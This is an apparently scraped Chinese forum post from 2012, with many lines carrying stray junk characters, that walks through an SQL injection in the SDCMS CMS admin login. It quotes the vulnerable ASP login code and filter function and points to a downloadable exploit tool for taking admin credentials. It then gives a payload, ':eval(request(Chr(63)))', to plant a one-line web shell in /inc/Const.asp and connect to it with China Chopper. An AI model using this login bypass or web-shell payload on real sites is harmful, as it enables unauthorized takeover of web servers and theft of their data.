作者:T00LS 鬼哥9 u" {- y7 S1 M7 {
漏洞文件:后台目录/index.asp3 ~: J! `, j5 Y" m: I
: t% h& r8 x# l$ b8 _- D" {Sub Check5 C" G7 t& l/ s y1 Q
Dim username,password,code,getcode,Rs# e2 I; w( U) C
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
! N. S2 R- j/ o J username=FilterText(Trim(Request.Form("username")),1). t* S) B* ]- m- ?- m2 X
password=FilterText(Trim(Request.Form("password")),1)
- d1 x! Q7 I/ b+ J4 T. K code=Trim(Request.Form("yzm"))
4 a1 x5 g: t0 A Q getcode=Session("SDCMSCode")
" H+ i' D( E! m2 ^7 A, ^ IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
]3 ?% F/ E5 U6 |/ X- r. K7 S& F IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
& ^# z, h2 G! i* m IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied# {- N) H( @0 l* ~, E
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied& y- @; _* [2 W# [6 \* e' O
IF username="" or password="" Then
, Z; c0 \3 D5 b6 ~& A2 i( O Echo "用户名或密码不能为空"ied
% A. A+ y( [+ w X Else/ z9 X* k y( B+ j b4 @" y' |6 M# s" C
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")6 C+ A: Y: T. Y; G1 G$ @
IF Rs.Eof Then
& e% |4 u0 V: v AddLog username,GetIp,"登录失败",1
3 w5 X6 w' ^% w! e$ N+ u Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
% a; ^2 q7 J: w3 y Else
# A2 ] q C, O& V) K' N4 l% p' B Add_Cookies "sdcms_id",Rs(0)& v- [- I# Y4 L' S! q
Add_Cookies "sdcms_name",username8 W, T5 t q, n. n: I
Add_Cookies "sdcms_pwd",Rs(2)
. T9 F/ R3 }& {( d4 v, a Add_Cookies "sdcms_admin",Rs(3)
! `. z; ?6 J2 @7 u Add_Cookies "sdcms_alllever",Rs(4)( d0 q% d9 V5 H; V" {$ j: l
Add_Cookies "sdcms_infolever",Rs(5)
" d6 b9 b2 m# v. R# u9 l- O& } Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")" M2 ]3 `' V. U: g$ D2 I+ ?
AddLog username,GetIp,"登录成功",14 g+ x* ?3 }1 t& ~' l! d v: e$ a+ e: g
'自动删除30天前的Log记录+ ~2 S7 t: h7 ]1 I0 a/ H- H: O
IF Sdcms_DataType Then: @6 T/ z$ v( f U# J; l) f) X
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")& I" ~ O# \5 X# @7 O) r* B$ f7 ~
Else
T5 P2 b1 G' `6 N' }6 N, \* b Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")0 s7 ^% m8 w5 D6 ]4 Y+ P: B( S
End IF
! V; K. Y7 E( l Go("sdcms_index.asp")" y. W% C; t; F: q$ x9 E8 e5 [
End IF
0 B& A0 }' |# y) z! l Rs.Close! r3 C/ N; i" O& |4 m9 B U
Set Rs=Nothing7 b) X+ m7 ?2 n i
End IF
( `" Y3 x& k d! x( J8 iEnd Sub1 M- C' p }' t) t0 Y( Z7 U
* ]$ n; m8 L3 _3 i! r* u s
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
: s2 q I, x1 p! ?- ^4 Y
# w! I, i3 ~% ]0 X; iFunction FilterText(ByVal t0,ByVal t1)8 A, b+ B3 d& h. N! }
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function( J L2 Q6 C$ P
t0=Trim(t0)9 R0 n- |6 m- B8 c
Select Case t1; |5 O5 Q' t1 _/ L( u9 A( C
Case "1"
) a7 W! A/ I; ^8 W. F t0=Replace(t0,Chr(32),"")
A3 ^0 T+ j$ Y t0=Replace(t0,Chr(13),"")6 b% e. y0 Q7 F' B( a6 C
t0=Replace(t0,Chr(10)&Chr(10),"")6 _! C0 l2 H5 d9 t5 H: u! m9 h
t0=Replace(t0,Chr(10),"")
/ } D# n" H- y# ] Case "2"
4 w' C( k4 N7 _5 y( i! ?2 f t0=Replace(t0,Chr(8),"")'回格
# d. }4 R; m* V6 w8 B4 ?* ]/ g t0=Replace(t0,Chr(9),"")'tab(水平制表符)
$ P! F7 p) z# ^3 Z8 i6 O( Y; ^ t0=Replace(t0,Chr(10),"")'换行
" i6 _1 c3 m. k! ^$ r t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
3 |# l* T U4 n' S$ I" u8 D t0=Replace(t0,Chr(12),"")'换页
4 t1 C7 Z9 _. V7 T6 | t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
; i/ d- M6 I) H/ j, T- E% z% A7 L t0=Replace(t0,Chr(22),"")
L0 [: }* ~$ T! ?0 H; {: c t0=Replace(t0,Chr(32),"")'空格 SPACE
. V" E) h: H' g0 p t0=Replace(t0,Chr(33),"")'!' T D1 [ w# |8 W
t0=Replace(t0,Chr(34),"")'"
( \& A+ V" p0 R2 D! j$ B2 C* l t0=Replace(t0,Chr(35),"")'#2 v9 Y" U$ R/ x) j' y6 M
t0=Replace(t0,Chr(36),"")'$
- k1 [% H( O9 b9 c$ I. f T8 O t0=Replace(t0,Chr(37),"")'%- j( z: z& f" H+ G) ? K
t0=Replace(t0,Chr(38),"")'&
. l/ c5 s- F V( U t0=Replace(t0,Chr(39),"")''5 r9 |6 U" I; q8 d# ^. t
t0=Replace(t0,Chr(40),"")'(, v5 R2 Z5 _% }9 i7 Q- W4 e
t0=Replace(t0,Chr(41),"")')
$ j5 B( h: k4 F5 b' b4 w, q; W t0=Replace(t0,Chr(42),"")'*
! M0 K+ _. Z+ r1 s7 f t0=Replace(t0,Chr(43),"")'+( \( j2 @) l/ j( n/ U! A; w
t0=Replace(t0,Chr(44),"")',
. }! r: D* }! A3 F t0=Replace(t0,Chr(45),"")'-+ r0 G+ U% s+ C9 C* B- m
t0=Replace(t0,Chr(46),"")'.& ~# E$ O/ C7 G- `2 I3 r' _/ ]
t0=Replace(t0,Chr(47),"")'/
! f& C5 x0 e& i# r t0=Replace(t0,Chr(58),"")':
3 \2 J/ y3 P q8 ]4 N t0=Replace(t0,Chr(59),"")';
2 P" }. k) A S' @, v) Z' b$ h2 a0 ` t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
2 d# @4 v+ p+ V' _8 ~ t0=Replace(t0,Chr(63),"")'?; x+ t* T! K2 A7 B% g2 D5 w, l
t0=Replace(t0,Chr(64),"")'@
- O+ b" P% A& R& N t0=Replace(t0,Chr(91),"")'\
8 C* v3 p( d4 I$ a4 E! H0 R t0=Replace(t0,Chr(92),"")'\' ]* l" @* n$ A0 U# }
t0=Replace(t0,Chr(93),"")']/ S+ T8 c" A t) ?
t0=Replace(t0,Chr(94),"")'^8 \' l! ]3 a, H
t0=Replace(t0,Chr(95),"")'_
7 q2 o( y) H8 m! |$ v t0=Replace(t0,Chr(96),"")'`
* w% x- F/ d7 L m* ^+ q t0=Replace(t0,Chr(123),"")'{
4 g8 Y% d1 h- ? t0=Replace(t0,Chr(124),"")'|
" Z+ C, m) n! `5 ?, [+ g! w t0=Replace(t0,Chr(125),"")'}
3 l9 k s6 s6 o1 p1 V t0=Replace(t0,Chr(126),"")'~
- X" a' ]) ^' m, Q Z2 A$ R5 E/ C Case Else2 A0 A' `; n% v8 x3 y5 R. \
t0=Replace(t0, "&", "&")8 n8 [* t$ Y# M5 Z
t0=Replace(t0, "'", "'")/ @) t0 o# ]/ e* q' {; ^: O
t0=Replace(t0, """", """)
: W2 u: S; ^/ Y* K u: n$ R" q$ V t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")6 o5 q9 X. m l& K' R7 r! s
End Select2 F( f7 e; S# y2 F( R; s: W M
IF Instr(Lcase(t0),"expression")>0 Then
) o( b5 }9 e9 v8 m t0=Replace(t0,"expression","e­xpression", 1, -1, 0). k$ j7 Z3 [% a4 w0 W# M+ v
End If
! m( v9 x$ G8 J& U% i, G2 O FilterText=t0
0 f0 M* w. [1 C: N% g1 oEnd Function
/ r" E' p* L; K& M+ H8 w N
& | \4 D9 x: d8 ]1 r3 R看到没。直接参数是1 只过滤
8 _1 F: e E4 D4 X8 j+ f% \. t& \ t0=Replace(t0,Chr(32)," ")
+ p. V: G$ w2 G% i1 X: t t0=Replace(t0,Chr(13),""): c- N* e2 a% ~$ a$ d2 A. s0 e. g% L
t0=Replace(t0,Chr(10)&Chr(10),"
7 _/ k+ ~7 j7 M# M. r" }) l")
* h& G: r$ D* [8 E t0=Replace(t0,Chr(10),"1 l; C6 Q& m6 \, {0 O
")
" E1 l) f7 t; e漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
) o* o/ V: ^2 {: H$ {7 FEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP6 X5 I$ [7 S/ v: R
6 _7 e* m2 y8 L+ y! F! M测试:
% w8 {3 H/ j# x
V( Z$ Q7 W2 W- U, L7 s: ~! T& J8 h
现在输入工具上验证码,然后点OK
' } x8 H9 o E4 K6 T
/ y1 G# T4 x3 }" a9 t% O1 U4 o7 {! p; s- s) S4 `$ E
看到我们直接进入后台管理界面了,呵呵!
5 g5 x) r" [3 _+ W/ h0 S* ]' v2 H$ m( ~( v+ W( q, i9 N7 y" y9 L
' Y0 Y4 \ V% c
% }- A$ H [$ M! \0 u8 [这样直接进入后台了。。。。4 v; ~0 }+ w' w
6 a. M' i; C( h& Y |' V , k' N! ?3 N: Y4 Y2 L7 A3 n: X# g
/ [' T0 k0 L0 D2 W
SDCMS提权:" X" E% g9 I' n" {$ k6 T: y7 z8 @% }
/ D. N* o% ]' o# v
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
, x4 X e& x6 j" R1 X3 `( B0 I$ b9 ]+ G8 d% k% u
) o: k3 T% T5 |
* W% p6 Z& h' F: O
OK,现在用菜刀连接下!
2 s: R/ e" q7 u( a5 I8 N5 _7 @
, L1 E) _4 J: e% H r3 {, P1 w' L, F! X" m
: M6 V! T8 M. I6 J* G. |5 f
) F5 K# m3 |- ~8 P# B- h
5 p# v! `2 z! P' v7 D( r0 m |
发表于 2012-11-9 20:57:02
收藏
支持
反对